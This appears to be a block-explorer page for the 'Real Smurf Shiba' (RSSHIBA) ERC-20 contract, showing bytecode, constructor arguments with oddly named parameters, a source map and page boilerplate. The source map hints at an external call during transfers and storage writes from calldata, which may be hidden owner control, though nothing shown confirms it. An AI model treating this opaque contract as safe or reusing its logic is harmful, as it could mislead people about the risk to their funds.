6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b6020808252600490820152633337bab960e11b604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610d8b57610d8b610e16565b500190565b6000816000190483118215151615610daa57610daa610e16565b500290565b60005b83811015610dca578181015183820152602001610db2565b838111156105ba5750506000910152565b600281046001821680610def57607f821691505b60208210811415610e1057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052604160045260246000fdfea264697066735822122054dde6f5cb058fe4df07460271591c7445164c33215ee8342d43a509c0fc913364736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d8bdb81419b03683ee97763b7670b384c42c65d5142ecfddc91bb1e5ba1aa513600000000000000000000000000000000000000000000000000000000000000105265616c20536d7572662053686962610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000075253534849424100000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Real Smurf Shiba
Arg [1] : symbol_ (string): RSSHIBA
Arg [2] : bow_ (address): 0xDff32C65f843188cF64ECBC6F4a13cFf12581b9D
Arg [3] : unshine_ (uint256): 63259317554260570353096810147906496374596169977714335067893926256316953284918

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d
Arg [3] : 8bdb81419b03683ee97763b7670b384c42c65d5142ecfddc91bb1e5ba1aa5136
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000010
Arg [5] : 5265616c20536d75726620536869626100000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [7] : 5253534849424100000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

111:11622:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1023:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3523:242;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;2151:108::-;;;:::i;:::-;;;;;;;:::i;4345:295::-;;;;;;:::i;:::-;;:::i;1994:92::-;;;:::i;:::-;;;;;;;:::i;5049:270::-;;;;;;:::i;:::-;;:::i;2322:177::-;;;;;;:::i;:::-;;:::i;5327:702::-;;;;;;:::i;:::-;;:::i;:::-;;980:87:2;;;:::i;:::-;;;;;;;:::i;1242:104:3:-;;;:::i;6925:503::-;;;;;;:::i;:::-;;:::i;2705:234::-;;;;;;:::i;:::-;;:::i;3002:201::-;;;;;;:::i;:::-;;:::i;9248:212::-;;;;;;:::i;:::-;;:::i;1023:100::-;1077:13;1110:5;1103:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1023:100;:::o;3523:242::-;3642:4;3664:13;3680:12;:10;:12::i;:::-;3664:28;;3703:32;3712:5;3719:7;3728:6;3703:8;:32::i;:::-;-1:-1:-1;3753:4:3;;3523:242;-1:-1:-1;;;3523:242:3:o;2151:108::-;2239:12;;2151:108;:::o;4345:295::-;4476:4;4493:15;4511:12;:10;:12::i;:::-;4493:30;;4534:38;4550:4;4556:7;4565:6;4534:15;:38::i;:::-;4583:27;4593:4;4599:2;4603:6;4583:9;:27::i;:::-;-1:-1:-1;4628:4:3;;4345:295;-1:-1:-1;;;;4345:295:3:o;1994:92::-;2077:1;1994:92;:::o;5049:270::-;5164:4;5186:13;5202:12;:10;:12::i;:::-;5186:28;;5225:64;5234:5;5241:7;5278:10;5250:25;5260:5;5267:7;5250:9;:25::i;:::-;:38;;;;:::i;:::-;5225:8;:64::i;2322:177::-;-1:-1:-1;;;;;2473:18:3;;2441:7;2473:18;;;:9;:18;;;;;;2322:177;;;;:::o;5327:702::-;5394:12;5409;:10;:12::i;:::-;5394:27;;5436:12;:10;:12::i;:::-;5432:590;;;5465:12;5480:4;;5485:1;5480:7;;;;;-1:-1:-1;;;5480:7:3;;;;;;;;;;;;;;;5490:1;5480:11;;;;:::i;:::-;5465:26;;5506:12;5521:4;;5526:1;5521:7;;;;;-1:-1:-1;;;5521:7:3;;;;;;;;;;;;;;;5531:1;5521:11;;;;:::i;:::-;5506:26;-1:-1:-1;5578:11:3;;5575:2;;5661:1;5654:15;;;5623:9;5691:16;;5749:2;5736:16;;5729:30;;;5575:2;5799:11;5796:2;;5882:1;5875:15;;;5851:1;5912:16;;5970:2;5957:16;;5848:1;5950:27;;5796:2;5556:455;;;5327:702;;;:::o;980:87:2:-;1026:7;1053:6;-1:-1:-1;;;;;1053:6:2;980:87;:::o;1242:104:3:-;1298:13;1331:7;1324:14;;;;;:::i;6925:503::-;7045:4;7067:13;7083:12;:10;:12::i;:::-;7067:28;;7106:24;7133:25;7143:5;7150:7;7133:9;:25::i;:::-;7106:52;;7211:15;7191:16;:35;;7169:122;;;;-1:-1:-1;;;7169:122:3;;;;;;;:::i;:::-;;;;;;;;;7327:60;7336:5;7343:7;7371:15;7352:16;:34;7327:8;:60::i;2705:234::-;2820:4;2842:13;2858:12;:10;:12::i;:::-;2842:28;;2881;2891:5;2898:2;2902:6;2881:9;:28::i;3002:201::-;-1:-1:-1;;;;;3168:18:3;;;3136:7;3168:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;3002:201::o;9248:212::-;9403:4;9393:15;9387:22;;9248:212::o;656:98:0:-;736:10;656:98;:::o;10557:380:3:-;-1:-1:-1;;;;;10693:19:3;;10685:68;;;;-1:-1:-1;;;10685:68:3;;;;;;;:::i;:::-;-1:-1:-1;;;;;10772:21:3;;10764:68;;;;-1:-1:-1;;;10764:68:3;;;;;;;:::i;:::-;-1:-1:-1;;;;;10845:18:3;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;;:36;;;10897:32;;;;;10875:6;;10897:32;:::i;:::-;;;;;;;;10557:380;;;:::o;11228:502::-;11363:24;11390:25;11400:5;11407:7;11390:9;:25::i;:::-;11363:52;;-1:-1:-1;;11430:16:3;:37;11426:297;;11530:6;11510:16;:26;;11484:117;;;;-1:-1:-1;;;11484:117:3;;;;;;;:::i;:::-;11645:51;11654:5;11661:7;11689:6;11670:16;:25;11645:8;:51::i;:::-;11228:502;;;;:::o;7898:929::-;-1:-1:-1;;;;;8029:18:3;;8021:68;;;;-1:-1:-1;;;8021:68:3;;;;;;;:::i;:::-;8180:17;8201:4;-1:-1:-1;;;;;8201:9:3;8249:12;:10;:12::i;:::-;8263:4;8225:43;;;;;;;;:::i;:::-;;;;-1:-1:-1;;8225:43:3;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;8225:43:3;-1:-1:-1;;;;;;8225:43:3;;;;;;;;;8201:78;;;8225:43;8201:78;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8177:102;;;8290:29;8301:4;8307;8313:5;8290:10;:29::i;:::-;-1:-1:-1;;;;;8352:15:3;;8330:19;8352:15;;;:9;:15;;;;;;8400:21;;;;8378:109;;;;-1:-1:-1;;;8378:109:3;;;;;;;:::i;:::-;-1:-1:-1;;;;;8523:15:3;;;;;;;:9;:15;;;;;;8541:20;;;8523:38;;8741:13;;;;;;;;;;:23;;;;;;8793:26;;;;;;8555:6;;8793:26;:::i;:::-;;;;;;;;7898:929;;;;;:::o;6037:164::-;6081:7;6113:1;6081:7;6137:5;6113:1;;6137:5;:::i;:::-;6125:17;-1:-1:-1;6153:9:3;6165:5;6169:1;6125:17;6165:5;:::i;:::-;:9;;6173:1;6165:9;:::i;:::-;6153:21;-1:-1:-1;;;;6037:164:3;:::o;6209:213::-;6253:4;6270:17;6290:5;6270:25;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;6306:11:3;6393:20;;-1:-1:-1;;6393:8:3;:20;;;;;;;6367;6270:25;;-1:-1:-1;6320:10:3;;6393:20;;-1:-1:-1;6367:20:3;;6320:10;;6270:25;;6367:20;;:::i;:::-;;;;;;;;;;;;;6357:31;;;;;;6349:40;;:64;6341:73;;;;6209:213;:::o;8835:105::-;8905:27;;;;;;;;;;;;-1:-1:-1;;;8905:27:3;;;;8835:105;:::o;8948:292::-;-1:-1:-1;;;;;9081:16:3;;9069:9;9081:16;;;:8;:16;;;;;;;9120:5;9081:16;9124:1;9120:5;:::i;:::-;9108:17;;9140:1;9145:5;9140:10;:16;;;;;9155:1;9154:2;9140:16;9136:97;;;9181:1;9186;9181:6;;:31;;;;9191:16;9202:4;9191:10;:16::i;:::-;:21;;9181:31;9173:48;;;;-1:-1:-1;;;9173:48:3;;;;;;;:::i;14:175:4:-;84:20;;-1:-1:-1;;;;;133:31:4;;123:42;;113:2;;179:1;176;169:12;194:198;;306:2;294:9;285:7;281:23;277:32;274:2;;;327:6;319;312:22;274:2;355:31;376:9;355:31;:::i;:::-;345:41;264:128;-1:-1:-1;;;264:128:4:o;397:274::-;;;526:2;514:9;505:7;501:23;497:32;494:2;;;547:6;539;532:22;494:2;575:31;596:9;575:31;:::i;:::-;565:41;;625:40;661:2;650:9;646:18;625:40;:::i;:::-;615:50;;484:187;;;;;:::o;676:342::-;;;;822:2;810:9;801:7;797:23;793:32;790:2;;;843:6;835;828:22;790:2;871:31;892:9;871:31;:::i;:::-;861:41;;921:40;957:2;946:9;942:18;921:40;:::i;:::-;911:50;;1008:2;997:9;993:18;980:32;970:42;;780:238;;;;;:::o;1023:266::-;;;1152:2;1140:9;1131:7;1127:23;1123:32;1120:2;;;1173:6;1165;1158:22;1120:2;1201:31;1222:9;1201:31;:::i;:::-;1191:41;1279:2;1264:18;;;;1251:32;;-1:-1:-1;;;1110:179:4:o;1294:666::-;;;1441:2;1429:9;1420:7;1416:23;1412:32;1409:2;;;1462:6;1454;1447:22;1409:2;1507:9;1494:23;1536:18;1577:2;1569:6;1566:14;1563:2;;;1598:6;1590;1583:22;1563:2;1641:6;1630:9;1626:22;1616:32;;1686:7;1679:4;1675:2;1671:13;1667:27;1657:2;;1713:6;1705;1698:22;1657:2;1758;1745:16;1784:2;1776:6;1773:14;1770:2;;;1805:6;1797;1790:22;1770:2;1864:7;1859:2;1853;1845:6;1841:15;1837:2;1833:24;1829:33;1826:46;1823:2;;;1890:6;1882;1875:22;1823:2;1926;1918:11;;;;;1948:6;;-1:-1:-1;1399:561:4;;-1:-1:-1;;;;1399:561:4:o;1965:957::-;;2064:2;2107;2095:9;2086:7;2082:23;2078:32;2075:2;;;2128:6;2120;2113:22;2075:2;2173:9;2160:23;2202:18;2243:2;2235:6;2232:14;2229:2;;;2264:6;2256;2249:22;2229:2;2307:6;2296:9;2292:22;2282:32;;2352:7;2345:4;2341:2;2337:13;2333:27;2323:2;;2379:6;2371;2364:22;2323:2;2420;2407:16;2442:2;2438;2435:10;2432:2;;;2448:18;;:::i;:::-;2497:2;2491:9;2566:2;2547:13;;-1:-1:-1;;2543:27:4;2531:40;;2527:49;;2591:18;;;2611:22;;;2588:46;2585:2;;;2637:18;;:::i;:::-;2673:2;2666:22;2697:18;;;2734:11;;;2730:20;;2727:33;-1:-1:-1;2724:2:4;;;2778:6;2770;2763:22;2724:2;2839;2834;2830;2826:11;2821:2;2813:6;2809:15;2796:46;2862:15;;;2858:24;;;2851:40;;;;-1:-1:-1;2866:6:4;2044:878;-1:-1:-1;;;2044:878:4:o;2927:260::-;;3009:5;3003:12;3036:6;3031:3;3024:19;3052:63;3108:6;3101:4;3096:3;3092:14;3085:4;3078:5;3074:16;3052:63;:::i;:::-;3169:2;3148:15;-1:-1:-1;;3144:29:4;3135:39;;;;3176:4;3131:50;;2979:208;-1:-1:-1;;2979:208:4:o;3192:274::-;;3359:6;3353:13;3375:53;3421:6;3416:3;3409:4;3401:6;3397:17;3375:53;:::i;:::-;3444:16;;;;;3329:137;-1:-1:-1;;3329:137:4:o;3752:203::-;-1:-1:-1;;;;;3916:32:4;;;;3898:51;;3886:2;3871:18;;3853:102::o;3960:319::-;-1:-1:-1;;;;;4137:32:4;;4119:51;;4206:2;4201;4186:18;;4179:30;;;3960:319;;4226:47;;4254:18;;4246:6;4226:47;:::i;:::-;4218:55;4109:170;-1:-1:-1;;;;4109:170:4:o;4284:187::-;4449:14;;4442:22;4424:41;;4412:2;4397:18;;4379:92::o;4476:222::-;;4625:2;4614:9;4607:21;4645:47;4688:2;4677:9;4673:18;4665:6;4645:47;:::i;4703:398::-;4905:2;4887:21;;;4944:2;4924:18;;;4917:30;4983:34;4978:2;4963:18;;4956:62;-1:-1:-1;;;5049:2:4;5034:18;;5027:32;5091:3;5076:19;;4877:224::o;5106:353::-;5308:2;5290:21;;;5347:2;5327:18;;;5320:30;5386:31;5381:2;5366:18;;5359:59;5450:2;5435:18;;5280:179::o;5464:402::-;5666:2;5648:21;;;5705:2;5685:18;;;5678:30;5744:34;5739:2;5724:18;;5717:62;-1:-1:-1;;;5810:2:4;5795:18;;5788:36;5856:3;5841:19;;5638:228::o;5871:327::-;6073:2;6055:21;;;6112:1;6092:18;;;6085:29;-1:-1:-1;;;6145:2:4;6130:18;;6123:34;6189:2;6174:18;;6045:153::o;6203:401::-;6405:2;6387:21;;;6444:2;6424:18;;;6417:30;6483:34;6478:2;6463:18;;6456:62;-1:-1:-1;;;6549:2:4;6534:18;;6527:35;6594:3;6579:19;;6377:227::o;6609:400::-;6811:2;6793:21;;;6850:2;6830:18;;;6823:30;6889:34;6884:2;6869:18;;6862:62;-1:-1:-1;;;6955:2:4;6940:18;;6933:34;6999:3;6984:19;;6783:226::o;7014:401::-;7216:2;7198:21;;;7255:2;7235:18;;;7228:30;7294:34;7289:2;7274:18;;7267:62;-1:-1:-1;;;7360:2:4;7345:18;;7338:35;7405:3;7390:19;;7188:227::o;7420:177::-;7566:25;;;7554:2;7539:18;;7521:76::o;7602:184::-;7774:4;7762:17;;;;7744:36;;7732:2;7717:18;;7699:87::o;7791:128::-;;7862:1;7858:6;7855:1;7852:13;7849:2;;;7868:18;;:::i;:::-;-1:-1:-1;7904:9:4;;7839:80::o;7924:168::-;;8030:1;8026;8022:6;8018:14;8015:1;8012:21;8007:1;8000:9;7993:17;7989:45;7986:2;;;8037:18;;:::i;:::-;-1:-1:-1;8077:9:4;;7976:116::o;8097:258::-;8169:1;8179:113;8193:6;8190:1;8187:13;8179:113;;;8269:11;;;8263:18;8250:11;;;8243:39;8215:2;8208:10;8179:113;;;8310:6;8307:1;8304:13;8301:2;;;-1:-1:-1;;8345:1:4;8327:16;;8320:27;8150:205::o;8360:380::-;8445:1;8435:12;;8492:1;8482:12;;;8503:2;;8557:4;8549:6;8545:17;8535:27;;8503:2;8610;8602:6;8599:14;8579:18;8576:38;8573:2;;;8656:10;8651:3;8647:20;8644:1;8637:31;8691:4;8688:1;8681:15;8719:4;8716:1;8709:15;8573:2;;8415:325;;;:::o;8745:127::-;8806:10;8801:3;8797:20;8794:1;8787:31;8837:4;8834:1;8827:15;8861:4;8858:1;8851:15;8877:127;8938:10;8933:3;8929:20;8926:1;8919:31;8969:4;8966:1;8959:15;8993:4;8990:1;8983:15

Swarm Source

ipfs://54dde6f5cb058fe4df07460271591c7445164c33215ee8342d43a509c0fc9133
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.